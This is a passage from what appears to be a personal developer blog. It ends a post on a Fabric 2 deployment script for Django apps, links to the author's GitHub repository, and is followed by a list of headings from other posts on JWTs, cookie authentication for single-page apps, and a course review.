Once that was cleared up, the API wasn’t actually that difficult to work with. In fact, it was pretty great! Some things that changed in the new release actually makes a lot of sense.

What use cases am I interested in?

Ultimately, all I want to do is to use it as a way to automate deploying Django apps. Instead of manually SSH-ing and doing a git pull, or doing an rsync to copy files to the application server.

I think it would be helpful to the community if we had some cookbooks or example fabfiles that we could use and modify quickly.

This seems to be missing both in the official docs and the community, so I decided to publish my own one.

My deployment file

You can find it here in my GitHub repository:

https://github.com/yoongkang/fabric-deployment

This is a script that works for me personally, and hopefully it helps other people as well.

Lim Yoong Kang

Name order

I made the front page of Hacker News

Year 2019 in review

Statelessness is not unique to JWTs

JWTs and cryptographic signing

That sounds great, what’s the problem?

So are JWTs useful at all?

Can you show me some code to create a stateless token in Django?

Summary

Cookie-based authentication with SPA and Django

What’s the problem with token-based auth?

What’s XSS?

How does using cookies help?

Cookies don’t protect you against XSS

Does that mean it doesn’t really matter where I put the token?

Do I need to serve the SPA using Django templates in order to use cookies?

How do I use cookies if my SPA and Django are deployed separately?

What if my SPA and Django are on different domains?

Use the correct CORS settings

Turn off the SameSite setting

Use withCredentials when making AJAX requests

Summary

Just completed Udacity’s Data Engineering Nanodegree!

Course structure

Student and peer experience

Quality of video lectures

Quality of course content

Quality of the projects

Mentoring

Verdict

txtimg – A library for text-based images

SyDjango August 2019

Tutorials suck

My fabric deployment script (fabric2)

My confusion with the documentation

Defining and running task functions

Aside: what exactly is this ‘context’ arg anyway?

Let’s try some stuff out and see if it works

What use cases am I interested in?

My deployment file

Turn off the `SameSite` setting

Use `withCredentials` when making AJAX requests